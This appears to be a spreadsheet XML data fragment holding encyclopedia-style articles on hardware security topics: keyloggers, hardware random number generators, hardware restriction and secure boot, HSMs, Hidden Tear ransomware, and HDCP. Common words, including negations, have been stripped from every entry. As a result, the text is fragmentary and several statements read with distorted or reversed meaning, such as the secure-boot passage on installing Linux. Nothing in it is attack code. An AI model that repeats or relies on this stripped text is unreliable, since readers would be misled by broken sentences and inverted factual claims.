computers, e.g. closed-circuit video surveillance access control, effective means preventing hardware keylogger installation. visual inspection easiest detecting hardware keyloggers. also techniques used hardware keyloggers market, detect software. cases computer case hidden view (e.g. public access kiosks case locked monitor, keyboard, mouse exposed view) user possibility software checks, user might thwart keylogger typing part password, using mouse move text editor window, typing garbage text, mousing back password window, typing next part password, etc. keylogger record unintelligible garbage password text. general keystroke logging countermeasures also options hardware keyloggers. main risk associated keylogger physical access needed twice: initially install keylogger, secondly retrieve thus, victim discovers keylogger, sting operation catch person retrieving this could include camera surveillance review access card swipe records determine gained physical access area time period keylogger removed. references external links presentation detection hardware keyloggers</t>
  </si>
  <si>
    <t>Hardware random number generator</t>
  </si>
  <si>
    <t>computing, hardware random number generator (hrng) true random number generator (trng) device generates random numbers physical process, rather means algorithm. such devices often based microscopic phenomena generate low-level, statistically random "noise" signals, thermal noise, photoelectric effect, involving beam splitter, quantum phenomena. these stochastic processes are, theory, completely unpredictable long equation governing phenomena unknown uncomputable, theory's assertions unpredictability subject experimental test. this contrast paradigm pseudo-random number generation commonly implemented computer programs. hardware random number generator typically consists transducer convert aspect physical phenomena electrical signal, amplifier electronic circuitry increase amplitude random fluctuations measurable level, type analog-to-digital converter convert output digital number, often simple binary digit repeatedly sampling randomly varying signal, series random numbers obtained. main application electronic hardware random number generators cryptography, used generate random cryptographic keys transmit data securely. they widely used internet encryption protocols transport layer security (tls). random number generators also built "random" macroscopic processes, using devices coin flipping, dice, roulette wheels lottery machines. presence unpredictability phenomena justified theory unstable dynamical systems chaos theory. even though macroscopic processes deterministic newtonian mechanics, output well-designed device like roulette wheel cannot predicted practice, depends sensitive, micro-details initial conditions use. although dice mostly used gambling, "randomizing" elements games (e.g. role playing games), victorian scientist francis galton described dice explicitly generate random numbers scientific purposes 1890.hardware random number generators generally produce limited number random bits second. order increase available output data rate, often used generate "seed" faster cryptographically secure pseudorandom number generator, generates pseudorandom output sequence much higher data rate. uses unpredictable random numbers first investigated context gambling, many randomizing devices dice, shuffling playing cards, roulette wheels, first developed use. fairly produced random numbers vital electronic gambling ways creating sometimes regulated governmental gaming commissions. random numbers also used non-gambling purposes, mathematically important, sampling opinion polls, situations fairness approximated randomization, military draft lotteries selecting jurors. cryptography major hardware random number generators field data encryption, example create random cryptographic keys nonces needed encrypt sign data. they secure alternative pseudorandom number generators (prngs), software programs commonly used computers generate "random" numbers. prngs deterministic algorithm produce numerical sequences. although pseudorandom sequences pass statistical pattern tests randomness, knowing algorithm conditions used initialize called "seed", output predicted. because sequence numbers produced prng principle predictable, data encrypted pseudorandom numbers potentially vulnerable cryptanalysis. hardware random number generators produce sequences numbers assumed predictable, therefore provide greatest security used encrypt data. early work early producing random numbers variation machines used play keno select lottery numbers. these involved mixed, numbered ping-pong balls blown air, perhaps combined mechanical agitation, used method withdraw balls mixing chamber (u.s. patent 4,786,056). this method gives reasonable results senses, random numbers generated means expensive. method inherently slow, unusable computing applications. april 1947, rand corporation began generating random digits "electronic roulette wheel", consisting random frequency pulse source 100,000 pulses second gated second constant frequency pulse five-bit binary counter. douglas aircraft built equipment, implementing cecil hasting's suggestion (rand p-113) noise source (most likely well known behavior miniature thyratron tube, placed magnetic field). twenty possible counter values mapped onto decimal digits counter values discarded.the results long rand machine, filtered tested, converted table, published 1955 book million random digits 100,000 normal deviates. rand table significant breakthrough delivering random numbers large carefully prepared table never available. useful source simulations, modeling, deriving arbitrary constants cryptographic algorithms demonstrate constants selected maliciously. block ciphers khufu khafre among applications rand table. see: nothing sleeve numbers. physical phenomena random properties quantum random properties there fundamental sources practical quantum mechanical physical randomness: quantum mechanics atomic sub-atomic level thermal noise (some quantum mechanical origin). quantum mechanics predicts certain physical phenomena, nuclear decay atoms, fundamentally random cannot, principle, predicted (for discussion empirical verification quantum unpredictability, bell test experiments). and, world exists temperature absolute zero, every system random variation state; instance, molecules gases composing constantly bouncing random (see statistical mechanics.) this randomness quantum phenomenon well (see phonon). because outcome quantum-mechanical events cannot predicted even principle, ‘gold standard’ random number generation. some quantum phenomena used random number generation include: shot noise, quantum mechanical noise source electronic circuits. simple example lamp shining photodiode. uncertainty principle, arriving photons create noise circuit. collecting noise poses problems, especially simple random noise source. however, shot noise energy always well distributed throughout bandwidth interest. diode thyratron electron tubes crosswise magnetic field generate substantial noise energy volts high impedance loads) peaked energy distribution require careful filtering achieve flatness across broad spectrum. nuclear decay radiation source, detected geiger counter attached photons travelling semi-transparent mirror. mutually exclusive events (reflection/transmission) detected associated values respectively. amplification signal produced base reverse-biased transistor. emitter saturated electrons occasionally tunnel band exit base. this signal amplified transistors result schmitt trigger. spontaneous parametric down-conversion leading binary phase state selection degenerate optical parametric oscillator. fluctuations vacuum energy measured homodyne detection. classical random properties thermal phenomena easier detect. they somewhat vulnerable attack lowering temperature system, though systems stop operating temperatures enough reduce noise factor (e.g., ~150 some thermal phenomena used include: thermal noise resistor, amplified provide random voltage source. avalanche noise generated avalanche diode, zener breakdown noise reverse-biased zener diode. atmospheric noise, detected radio receiver attached (though much lightning noise, properly thermal noise, likely chaotic phenomenon).in absence quantum effects thermal noise, phenomena tend random, although ways easily characterized laws physics, used. when several sources combined carefully example, yarrow algorithm fortuna csprngs), enough entropy collected creation cryptographic keys nonces, though generally restricted rates. advantage approach needs, principle, special hardware. disadvantage sufficiently knowledgeable attacker surreptitiously modify software inputs, thus reducing randomness output, perhaps substantially. primary source randomness typically used approaches precise timing interrupts caused mechanical input/output devices, keyboards disk drives, various system information counters, etc. this last approach must implemented carefully subject attack not. instance, forward-security generator linux 2.6.10 kernel could broken time complexity. clock drift another variable physical phenomenon easy measure clock drift. there several ways measure clock drift source randomness. intel 82802 firmware (fwh) chip included hardware using free running oscillators, fast slow. thermal noise source (non-commonmode noise diodes) used modulate frequency slow oscillator, triggers measurement fast oscillator. that output debiased using neumann type decorrelation step (see below). output rate device somewhat less 100,000 bit/s. this chip optional component chipset family supported earlier intel bus. included modern pcs. microprocessors included hardware processor chip since 2003. instead using thermal noise, bits generated using four freerunning oscillators designed different rates. output xored control bias third oscillator, whose output clocks output fourth oscillator produce bit. minor variations temperature, silicon characteristics, local electrical conditions cause continuing oscillator speed variations thus produce entropy bits. ensure randomness, actually rngs chip, positioned different environments rotated silicon. final output generators. output rate tens hundreds megabits second, whitened rate megabits second. user software access generated random stream using non-privileged machine language instructions. software implementation related idea ordinary hardware included cryptolib, cryptographic routine library. algorithm called truerand. most modern computers crystal oscillators, real-time clock primary clock; truerand exploits fact. uses operating system service sets alarm, running real-time clock. subroutine sets alarm clock tick (usually 1/60th second). another enters loop waiting alarm trigger. since alarm always trigger exactly tick, least significant bits count loop iterations, setting alarm trigger, vary randomly, possibly enough uses. truerand require additional hardware, multi-tasking system great care must taken avoid non-randomizing interference processes (e.g., suspension counting loop process operating system scheduler starts stops assorted processes). rdrand opcode return values onboard hardware random number generator. present intel bridge processors amd64 processors since 2015. dealing bias bit-stream systems prone biased, either predominating. there approaches dealing bias artifacts. first design minimize bias inherent operation generator. method correct feeds back generated stream, filtered low-pass filter, adjust bias generator. central limit theorem, feedback loop tend well-adjusted 'almost time'. ultra-high speed random number generators often method. even then, numbers generated usually somewhat biased. software whitening second approach coping bias reduce generation software hardware). there several techniques reducing bias correlation, often called "whitening" algorithms, analogy related problem producing white noise correlated signal. john neumann invented simple algorithm simple bias reduce correlation. considers bits time (non-overlapping), taking three actions: successive bits equal, discarded; sequence becomes sequence becomes zero. thus represents falling edge rising edge this eliminates simple bias, easy implement computer program digital logic. this technique works matter bits generated. cannot assure randomness output, however. what (with significant numbers discarded bits) transform biased random stream unbiased one. another technique improving near random stream exclusive-or stream output high-quality cryptographically secure pseudorandom number generator blum blum shub strong stream cipher. this improve decorrelation digit bias cost; done hardware, field-programmable gate array, faster software. related method reduces bias near random stream take uncorrelated near random streams, exclusive together. probability stream producing −1/2 1/2. then bias bitstream. uncorrelated streams bias exclusive-or-ed together, bias result 2e2. this repeated streams (see also piling-up lemma). some designs apply cryptographic hash functions md5, sha-1, ripemd-160 even function part stream, output random stream. this attractive, partly relatively fast. many physical phenomena used generate bits highly biased, independent others. geiger counter (with sample time longer tube recovery time) semi-transparent mirror photon detector generate streams mostly (silent transmission) occasional (click reflection). independent others, neumann strategy generates random, unbiased output rare bits highly biased stream. whitening techniques advanced multi-level strategy (amls) extract output bits output bits random unbiased highly biased stream. prng periodically refreshed random other designs believed true random bits high quality block cipher algorithm, taking encrypted output random stream. care must taken cases select appropriate block mode, however. implementations, prng limited number digits, hardware generating device produces seed. using observed events software engineers without true random number generators often develop measuring physical events available software. example measuring time user keystrokes, taking least significant three) count random digit. similar approach measures task-scheduling, network hits, disk-head seek times internal events. microsoft design includes long list internal values, form cryptographically secure pseudorandom number generator. lava lamps also used physical devices monitored, lavarand system. method risky uses computer-controlled events clever, malicious attacker might able predict cryptographic controlling external events. also risky supposed user-generated event (e.g., keystrokes) spoofed sufficiently ingenious attacker, allowing control "random values" used cryptography. however, sufficient care, system designed produces cryptographically secure random numbers sources randomness available modern computer. basic design maintain "entropy pool" random bits assumed unknown attacker. randomness added whenever available (for example, user hits key) estimate number bits pool cannot known attacker kept. some strategies include: when random bits requested, return many bits derived entropy pool cryptographic hash function, say) decrement estimate number random bits remaining pool. enough unknown bits available, wait enough available. this top-level design "/dev/random" device linux, written theodore ts'o used many unix-like operating systems. provides high-quality random numbers long estimates input randomness sufficiently cautious. linux "/dev/urandom" device simple modification disregards estimates input randomness, therefore rather less likely high entropy result. maintain stream cipher initialization vector (iv) obtained entropy pool. when enough bits entropy collected, replace random values decrease estimated entropy remaining pool. this approach taken yarrow library. provides resistance attacks conserves hard-to-obtain entropy. (de)centralized systems true random number generator (de)central service. example centralized system random number acquired randomness beacon service national institute standards technology; another example random.org, service uses atmospheric noise generate random binary digits (bits). example decentralized system, cardano platform uses participants decentralized proof-of-stake protocol generate random numbers. problems easy misconstruct hardware software devices attempt generate random numbers. also, 'break' silently, often producing decreasingly random numbers degrade. physical example might rapidly decreasing radioactivity smoke detectors mentioned earlier, source used directly. failure modes devices plentiful complicated, slow, hard detect. methods combine multiple sources entropy robust. because many entropy sources often quite fragile, fail silently, statistical tests output performed continuously. many, all, devices include tests software reads device. attacks just components cryptography system, software random number generator designed resist certain attacks. defending attacks difficult without hardware entropy source. estimating entropy there mathematical techniques estimating entropy sequence symbols. none reliable estimates fully relied upon; always assumptions difficult confirm. these useful determining enough entropy seed pool, example, cannot, general, distinguish true random source pseudorandom generator. this problem avoided conservative hardware entropy sources. performance test hardware random number generators constantly monitored proper operation. 4086, fips 140-2 nist special publication 800-90b include tests used this. also documentation zealand cryptographic software library cryptlib. since many practical designs rely hardware source input, useful least check source still operating. statistical tests often detect failure noise source, radio station transmitting channel thought empty, example. noise generator output sampled testing passed "whitener." some whitener designs pass statistical tests random input. while detecting large deviation perfection would sign true random noise source become degraded, small deviations normal indication proper operation. correlation bias inputs generator design parameters (e.g., internal temperature, voltage) might additionally useful check. unfortunately, currently available (and foreseen) tests, passing tests enough sure output sequences random. carefully chosen design, verification manufactured device implements design continuous physical security insure tampering needed addition testing high value uses. also an/cyz-9 bell test experiments /dev/random ernie list random number generators lottery machine randomness extractor rdrand trusted platform module references general references external links 4086 randomness recommendations security (replaces earlier 1750), ietf. intel random number generator (pdf), intel, april 1999. protegost sg100, protegost, "hardware random number generator "based quantum physics random number source zener diode".</t>
  </si>
  <si>
    <t>Hardware reset</t>
  </si>
  <si>
    <t>hardware reset hard reset computer system hardware operation re-initializes core hardware components system, thus ending current software operations system. this typically, always, followed booting system firmware re-initializes rest system, restarts operating system. hardware resets essential part power-on process, also triggered without power cycling system direct user intervention physical reset button, watchdog timers, software intervention that, last action, activates hardware reset line (e.g, fatal error computer crashes). user initiated hard resets used reset device software hangs, crashes, otherwise unresponsive. however, data become corrupted occurs. generally, hard reset initiated pressing dedicated reset button, holding combination buttons mobile devices. devices dedicated reset button, user hold power button power, user turn computer back systems (e.g, playstation video game console), pressing releasing power button initiates hard reset, holding button turns system off. hardware reset 80x86 8086 microprocessors provide reset used hardware reset. when high applied pin, immediately stops, sets major registers values: uses values registers find location next instruction execute. location next instruction calculated using simple equation: location next instruction (cs&lt;&lt;4) (ip) this implies hardware reset, start execution physical address 0xffff0. compatible computers, this address maps bios rom. memory word 0xffff0 usually contains instruction redirects execute initialization code bios. this instruction absolutely first instruction executed reset. hardware reset later cpus later processors reset registers similarly, refer reset vector. also power-on reset power-on self test reset vector reboot (computing) references</t>
  </si>
  <si>
    <t>Hardware restriction</t>
  </si>
  <si>
    <t>hardware restriction (sometimes called hardware drm) low-level protection enforced electronic components. hardware restriction scheme protect physical malware attacks complement digital rights management system implemented software. some examples hardware restriction information appliances video game consoles, smartphones, tablet computers, macintosh computers personal computers implement secure boot. instances hardware restriction upgradeable processors some intel processors sold features "locked", later unlocked payment.note unique intel. some models ibm's system/370 mainframe computer additional hardware included, customer paid additional charge, would send service engineer enable typically cutting resistor machine. trusted execution environment vendor exploits privileged position maker devices embeds device unextractable private coupled public database hash public key. vendor also adds privileged mode device protect data processed (including program code) hardware encryption memory. vendor adds additional privileged mode allowing software mode control access software mode secrets stored restricts mode software signed public key. vendor implements software controlling access mode parties signed business agreement vendor controlling access data creating proof software untampered using fact embedded hardware cannot accessed reasonable cost anyone except vendor. then vendor sells access usage mode devices consumers parties interested deprivation device owners ownership. these parties implement software more) modules ship users' machines. generic module loads trusted module calls trusted privileged vendor software activate protection create cryptographic proof developer's software state intends replaced software. generic module sends proof network developer, checks proof. sometimes done using vendor's internet service. then developer either sends data wants prevent computer owners access hardware vendor access data issuing modified version privileged software controlling access, enabling create fake proofs, verifications proof done using internet service, modifying service falsely claim proof valid. data tees also accessed exploiting various side channels reverse engineering specific chip extracting possible, costs lot. data processed enough value, malware proprietary content. since vendors disable tees system firmware tampered (sometimes permanently damaging chip blowing e-fuse), using proofs used software service vendors prevent reverse engineering software and/or accessing services tampered device even software storing secrets. intel insider intel insider, technology provides "protected path" digital content, considered form drm. verified/trusted boot some devices implement feature called "verified boot", "trusted boot" "secure boot", allow signed software device, usually device manufacturer. this considered restriction unless users either ability disable ability sign software. android devices many modern android devices, huawei nokia phones come bootloader locked. apple devices apple's devices (iphone, ipad, ipod touch, apple require signatures firmware installation, intended verify latest official firmware installed devices. official firmware allows third-party software installed store. macs equipped security chip also equipped secure boot, ensuring trusted versions apple's macos microsoft's windows operating systems support secure boot start. tivo device runs software approved hardware vendor, certain version free software program allowed device, user cannot exercise rights theoretically have, cannot install modified versions. olpc another case trusted boot laptop child laptop boot software signed private cryptographic known olpc non-profit organisation respective deployment authorities education ministries. laptops distributed directly olpc organisation provide disable restrictions, requesting "developer key" unique laptop, internet, waiting hours receive installing running firmware command "disable-security". however deployments uruguay deny requests keys. stated goal deter mass theft laptops children distribution channels, making laptops refuse boot, making hard reprogram boot delaying issuance developer keys allow time check whether key-requesting laptop stolen. secure boot certified windows hardware requires secure boot. soon feature announced september 2011, caused widespread fear would lock-out alternative operating systems. january 2012, microsoft confirmed would require hardware manufacturers enable secure boot windows devices, x86/64 devices must provide option turn arm-based devices must provide option turn off. according glyn moody, computerworld, "approach seems making hard impossible install linux hardware systems certified windows reality shown x86_64 platforms, secure boot available hindered installing linux distributions support order harden system attacks. solaris verified boot oracle solaris 11.2 verified boot feature, checks signatures boot block kernel modules. default disabled. enabled, "warning" mode warning message logged signature failures "enforce" mode module loaded. solaris elfsign(1) command inserts signature kernel modules. kernel modules distributed oracle signature. third-party kernel modules allowed, providing public certificate installed firmware establish root trust). also free hardware homebrew (video games) vendor lock-in crippleware planned obsolescence references external links introduction tivoization linux information project (linfo)</t>
  </si>
  <si>
    <t>Hardware restrictions</t>
  </si>
  <si>
    <t>Hardware security bug</t>
  </si>
  <si>
    <t>digital computing, hardware security bugs hardware bugs flaws create vulnerabilities affecting computer central processing units (cpus), devices incorporate programmable processors logic direct memory access, allow data read rogue process reading authorized. such vulnerabilities considered "catastrophic" security analysts. speculative execution vulnerabilities starting 2017, series security vulnerabilities found implementations speculative execution common processor architectures effectively enabled elevation privileges. these include: foreshadow meltdown microarchitectural data sampling spectre spoiler pacman intel visa 2019 researchers discovered manufacturer debugging mode, known visa, undocumented feature intel platform controller hubs, chipsets included intel-based motherboards direct memory access, made mode accessible normal motherboard possibly leading security vulnerability. also hardware security security computer security threat (computer) references</t>
  </si>
  <si>
    <t>Hardware security module</t>
  </si>
  <si>
    <t>hardware security module (hsm) physical computing device safeguards manages digital keys, performs encryption decryption functions digital signatures, strong authentication cryptographic functions. these modules traditionally come form plug-in card external device attaches directly computer network server. hardware security module contains secure cryptoprocessor chips. design hsms features provide tamper evidence visible signs tampering logging alerting, tamper resistance makes tampering difficult without making inoperable, tamper responsiveness deleting keys upon tamper detection. each module contains secure cryptoprocessor chips prevent tampering probing, combination chips module protected tamper evident, tamper resistant, tamper responsive packaging. vast majority existing hsms designed mainly manage secret keys. many systems means securely back keys handle outside hsm. keys backed wrapped form stored computer disk media, externally using secure portable device like smartcard security token.hsms used real time authorization authentication critical infrastructure thus typically engineered support standard high availability models including clustering, automated failover, redundant field-replaceable components. hsms available market capability execute specially developed modules within hsm's secure enclosure. such ability useful, example, cases special algorithms business logic executed secured controlled environment. modules developed native language, .net, java, programming languages. further, upcoming next-generation hsms handle complex tasks loading running full operating systems cots software without requiring customization reprogramming. such unconventional designs overcome existing design performance limitations traditional hsms. while providing benefit securing application-specific code, execution engines protect status hsm's fips common criteria validation. security critical role play securing applications infrastructure, hsms and/or cryptographic modules typically certified internationally recognized standards common criteria fips provide users independent assurance design implementation product cryptographic algorithms sound. highest level fips security certification attainable security level (overall). when used financial payments applications, security often validated requirements defined payment card industry security standards council. uses hardware security module employed application uses digital keys. typically keys would high value meaning would significant, negative impact owner compromised. functions are: onboard secure cryptographic generation onboard secure cryptographic storage, least level sensitive keys, often called master keys management cryptographic sensitive data material, example, performing encryption digital signature functions offloading application servers complete asymmetric symmetric cryptography.hsms also deployed manage transparent data encryption keys databases keys storage devices disk tape. hsms provide logical physical protection materials, including cryptographic keys, disclosure, non-authorized use, potential adversaries.hsms support symmetric asymmetric (public-key) cryptography. applications, certificate authorities digital signing, cryptographic material asymmetric pairs (and certificates) used public-key cryptography. with applications, data encryption financial payment systems, cryptographic material consists mainly symmetric keys. some systems also hardware cryptographic accelerators. they usually cannot beat performance hardware-only solutions symmetric operations. however, performance ranges 10,000 1024-bit signs second, hsms provide significant offload asymmetric operations. since national institute standards technology (nist) recommending 2,048 keys year 2010, performance longer sizes become important. address issue, hsms support elliptic curve cryptography (ecc), delivers stronger encryption shorter lengths. environment hsms) environments, hsms used certification authorities (cas) registration authorities (ras) generate, store, handle asymmetric pairs. cases, fundamental features device must have, namely: logical physical high-level protection multi-part user authorization schema (see blakley-shamir secret sharing) full audit traces secure backupon hand, device performance environment generally less important, online offline operations, registration authority procedures represent performance bottleneck infrastructure. card payment system hsms (bank hsms) specialized hsms used payment card industry. hsms support general-purpose functions specialized functions required process transactions comply industry standards. they normally feature standard api. typical applications transaction authorization payment card personalization, requiring functions verify user-entered matches reference known card issuer verify credit/debit card transactions checking card security codes performing host processing components based transaction conjunction controller terminal support crypto-api smart card (such emv) re-encrypt block send another authorization host perform secure management support protocol network management support facto standards host-host data exchange generate print "pin mailer" generate data magnetic stripe card (pvv, cvv) generate card keyset support personalization process smart cardsthe major organizations produce maintain standards hsms banking market payment card industry security standards council, iso. connection establishment performance-critical applications https (ssl/tls), benefit acceleration moving operations, typically requires several large integer multiplications, host device. typical devices perform 10,000 1024-bit operations/second. some performance longer sizes becoming increasingly important. address issue, hsms support ecc. specialized devices reach numbers high 20,000 operations second. dnssec increasing number registries hsms store material used sign large zonefiles. opendnssec open-source tool manages signing zone files. january 2007, icann verisign, support u.s. department commerce, started deploying dnssec root zones. root signature details found root dnssec's website. cryptocurrency wallet cryptocurrency stored cryptocurrency wallet hsm. also electronic funds transfer fips public infrastructure pkcs secure cryptoprocessor security token transparent data encryption security switch trusted platform module notes references external links current nist fips-140 certificates review hardware security modules</t>
  </si>
  <si>
    <t>Hardware-based encryption</t>
  </si>
  <si>
    <t>hardware-based encryption computer hardware assist software, sometimes replace software, process data encryption. typically, implemented part processor's instruction set. example, encryption algorithm modern cipher) implemented using instruction ubiquitous architecture. such instructions also exist architecture. however, unusual systems exist cryptography module separate central processor, instead implemented coprocessor, particular secure cryptoprocessor cryptographic accelerator, example 4758, successor, 4764. hardware implementations faster less prone exploitation traditional software implementations, furthermore protected tampering. history prior computer hardware, cryptography could performed various mechanical electro-mechanical means. early example scytale used spartans. enigma machine electro-mechanical system cipher machine notably used germans world after world purely electronic systems developed. 1987 abyss basic yorktown security system) project initiated. project protect software piracy. however, application computers cryptography general dates back 1940s bletchley park, colossus computer used break encryption used german high command world computers encrypt, however, came later. particular, development integrated circuit, first produced 1960, computers impractical encryption, since, comparison portable form factor enigma machine, computers took space entire building. development microcomputer computer encryption became feasible, outside niche applications. development world wide lead need consumers access encryption, online shopping became prevalent. concerns consumers security speed. this eventual inclusion algorithms processors increasing speed security. implementations instruction architecture, cisc (complex instruction computer) architecture, typically implements complex algorithms hardware. cryptographic algorithms exception. architecture implements significant components (advanced encryption standard) algorithm, used secret information. architecture also includes support hashing algorithms intel extensions. whereas cipher, useful encrypting documents, hashing used verification, passwords (see pbkdf2). processors optionally support security extensions. although risc (reduced instruction computer) architecture, several optional extensions specified holdings. coprocessor 4758 predecessor 4764. this includes specialised processor, memory random number generator. 4764 4765, identical except connection used. former uses pci-x, latter uses pci-e. both peripheral devices plug motherboard. proliferation advanced micro devices (amd) processors also devices, supported instructions since 2011 bulldozer processor iteration. existence encryption instructions modern processors provided intel amd, instructions present modern computers. they also exist many tablets smartphones implementation processors. advantages implementing cryptography hardware means part processor dedicated task. this lead large increase speed. particular, modern processor architectures support pipelining often perform instructions concurrently execution encryption instruction. furthermore, hardware methods protecting data software. consequently, even operating system compromised, data still secure (see software guard extensions). disadvantages however, hardware implementation compromised, major issues arise. malicious software retrieve data (supposedly) secure hardware large class method used timing attack. this problematic solve software bug, even within operating system. microsoft regularly deals security issues windows update. similarly, regular security updates released linux, well mobile operating systems like ios, android, windows phone. however, hardware different issue. sometimes, issue fixable updates processor's microcode level type software). however, issues resolvable replacing hardware, workaround operating system mitigates performance benefit hardware implementation, spectre exploit. also disk encryption hardware hardware-based full disk encryption hardware security module references</t>
  </si>
  <si>
    <t>Hidden Tear</t>
  </si>
  <si>
    <t>hidden tear first open-source ransomware trojan targets computers running microsoft windows original sample posted august 2015 github kurdish security researcher. when hidden tear activated, encrypts certain types files using symmetric algorithm, sends symmetric malware's control servers. however, corduenewarez claimed "all malware codes backdoored purpose", hidden tear encryption backdoor, thus allowing crack various samples. references</t>
  </si>
  <si>
    <t>High-availability cluster</t>
  </si>
  <si>
    <t>high-availability clusters (also known clusters, fail-over clusters) groups computers support server applications reliably utilized minimum amount down-time. they operate using high availability software harness redundant computers groups clusters provide continued service system components fail. without clustering, server running particular application crashes, application unavailable crashed server fixed. clustering remedies situation detecting hardware/software faults, immediately restarting application another system without requiring administrative intervention, process known failover. part process, clustering software configure node starting application example, appropriate file systems need imported mounted, network hardware configured, supporting applications need running well.ha clusters often used critical databases, file sharing network, business applications, customer services electronic commerce websites. cluster implementations attempt build redundancy cluster eliminate single points failure, including multiple network connections data storage redundantly connected storage area networks. clusters usually heartbeat private network connection used monitor health status node cluster. subtle serious condition clustering software must able handle split-brain, occurs private links simultaneously, cluster nodes still running. happens, node cluster mistakenly decide every node gone attempt start services nodes still running. having duplicate instances services cause data corruption shared storage. clusters often also quorum witness storage (local cloud) avoid scenario. witness device cannot shared halves split cluster, event cluster members cannot communicate (e.g., failed heartbeat), member cannot access witness, cannot become active. application design requirements every application high-availability cluster environment, necessary design decisions need made early software design phase. order high-availability cluster environment, application must satisfy least following technical requirements, last critical reliable function cluster, difficult satisfy fully: there must relatively easy start, stop, force-stop, check status application. practical terms, means application must command line interface scripts control application, including support multiple instances application. application must able shared storage (nas/san). most importantly, application must store much state non-volatile shared storage possible. equally important ability restart another node last state failure using saved state shared storage. application must corrupt data crashes, restarts saved state. number constraints minimized virtual server environments, wherein hypervisor cluster-aware provides seamless migration virtual machines (including running memory state) physical hosts—see microsoft server 2012 2016 failover clusters. difference approach running cluster-aware applications latter deal server application crashes support live "rolling" software upgrades maintaining client access service (e.g. database), instance provide service another upgraded repaired. this requires cluster instances communicate, flush caches coordinate file access hand-off. failover clustering falls planning, creating configuring also troubleshooting. node configurations common size cluster two-node cluster, since minimum required provide redundancy, many clusters consist many more, sometimes dozens nodes. attached diagram good overview classic cluster, caveat make mention quorum/witness functionality (see above). such configurations sometimes categorized following models: active/active traffic intended failed node either passed onto existing node load balanced across remaining nodes. this usually possible nodes homogeneous software configuration. active/passive provides fully redundant instance node, brought online associated primary node fails. this configuration typically requires extra hardware. provides single extra node brought online take role node failed. case heterogeneous software configuration primary node, extra node must universally capable assuming roles primary nodes responsible for. this normally refers clusters multiple services running simultaneously; single service case, degenerates active/passive. cases single cluster managing many services, dedicated failover node might offer sufficient redundancy. cases, standby servers included available. number standby servers tradeoff cost reliability requirements. n-to-1 allows failover standby node become active temporarily, original node restored brought back online, point services instances must failed-back order restore high availability. n-to-n combination active/active clusters, clusters redistribute services, instances connections failed node among remaining active nodes, thus eliminating active/active) need 'standby' node, introducing need extra capacity active nodes.the terms logical host cluster logical host used describe network address used access services provided cluster. this logical host identity tied single cluster node. actually network address/hostname linked service(s) provided cluster. cluster node running database goes down, database restarted another cluster node. node reliability clusters usually available techniques make individual systems shared infrastructure reliable possible. these include: disk mirroring redundant arrays independent disks—raid) failure internal disks result system crashes. distributed replicated block device example. redundant network connections single cable, switch, network interface failures result network outages. redundant storage area network (san) connections single cable, switch, interface failures lead loss connectivity storage (this would violate shared nothing architecture). redundant electrical power inputs different circuits, usually protected uninterruptible power supply units, redundant power supply units, single power feed, cable, ups, power supply failures lead loss power system.these features help minimize chances clustering failover systems required. failover, service provided unavailable least little while, measures avoid failover preferred. failover strategies systems handle failures distributed computing different strategies cure failure. instance, apache cassandra hector defines three ways configure failover: fail fast, scripted "fail_fast", means attempt cure failure fails first node cannot reached. fail, next available, scripted "on_fail_try_one_next_available", means system tries host, accessible available, giving fail, all, scripted "on_fail_try_all_available", means system tries existing, available nodes giving also service availability forum opensaf urgent computing pacemaker (software) parallel sysplex list cluster management software references further reading greg pfister: search clusters, prentice hall, isbn 0-13-899709-8 evan marcus, stern: blueprints high availability: designing resilient distributed systems, john wiley sons, isbn 0-471-35601-8 chee-wei ang, chen-khong tham: analysis optimization service availability cluster load-dependent machine availability, ieee transactions parallel distributed systems, volume issue (september 2007), pages 1307-1319, issn 1045-9219</t>
  </si>
  <si>
    <t>High-bandwidth Digital Content Protection</t>
  </si>
  <si>
    <t>high-bandwidth digital content protection (hdcp) form digital copy protection developed intel corporation prevent copying digital audio video content travels across connections. types connections include displayport (dp), digital visual interface (dvi), high-definition multimedia interface (hdmi), well less popular deprecated protocols like gigabit video interface (gvif) unified display interface (udi). system meant stop hdcp-encrypted content played unauthorized devices devices modified copy hdcp content. before sending data, transmitting device checks receiver authorized receive transmitter encrypts data prevent eavesdropping flows receiver.in order make device plays hdcp-enabled content, manufacturer must obtain license patent intel subsidiary digital content protection llc, annual fee, submit various conditions. example, device cannot designed copy; must "frustrate attempts defeat content protection requirements"; must transmit high definition protected video non-hdcp receivers; dvd-audio works played cd-audio quality non-hdcp digital audio outputs (analog audio outputs quality limits). cryptanalysis researchers demonstrated flaws hdcp early 2001. september 2010, hdcp master allows generation valid device keys released public, rendering revocation feature hdcp useless. intel confirmed crack real, believes master reverse engineered rather leaked. practical terms, impact crack described "the digital equivalent pointing video camera tv", limited importance consumers encryption high-definition discs attacked directly, loss interactive features like menus. intel threatened anyone producing unlicensed device. specification hdcp uses three systems: authentication prevents non-licensed devices receiving content. encryption data sent displayport, dvi, hdmi, gvif, interfaces prevents eavesdropping information man-in-the-middle attacks. revocation prevents devices compromised cloned receiving data.each hdcp-capable device unique 56-bit keys. failure keep secret violates license agreement. values, special private called (key selection vector) created. each consists bits (one hdcp key), bits bits during authentication, parties exchange ksvs procedure called blom's scheme. each device adds secret keys together (using unsigned addition modulo 256) according received another device. depending order bits ksv, corresponding secret used ignored addition. generation keys ksvs gives devices 56-bit number, later used encrypt data. encryption done stream cipher. each decoded pixel encrypted applying operation 24-bit number produced generator. hdcp specifications ensure constant updating keys encoded frame. particular keys compromised, corresponding added revocation list burned onto discs blu-ray formats. (the lists signed digital signature, meant keep malicious users revoking legitimate devices.) during authentication, transmitting device looks receiver's list, there, send decrypted work revoked device. uses hdcp devices generally divided three categories: source source sends content displayed. examples include set-top boxes, dvd, blu-ray disc players, computer video cards. source hdcp/hdmi transmitter. sink sink renders content display viewed. examples include digital projectors. sink hdcp/hdmi receivers. repeater repeater accepts content, decrypts re-encrypts retransmits data. perform signal processing, upconverting video higher-resolution format, splitting audio portion signal. repeaters hdmi inputs outputs. examples include home theater audio-visual receivers separate amplify audio signal, re-transmitting video display repeater could also simply send input data stream multiple outputs simultaneous display several screens.each device contain hdcp transmitters and/or receivers. single transmitter receiver chip combine hdcp hdmi functionality.)in united states, federal communications commission (fcc) approved hdcp "digital output protection technology" august 2004. fcc's broadcast flag regulations, struck united states court appeals district columbia circuit, would required technologies digital outputs hdtv signal demodulators. congress still considering legislation would implement something similar broadcast flag. hdcp standard restrictive fcc's digital output protection technology requirement. hdcp bans compliant products converting hdcp-restricted content full-resolution analog form, presumably attempt reduce size analog hole.on january 2005, european information, communications, consumer electronics technology industry associations (eicta) announced hdcp required component european ready" label.microsoft windows vista windows hdcp computer graphics cards monitors. circumvention hdcp 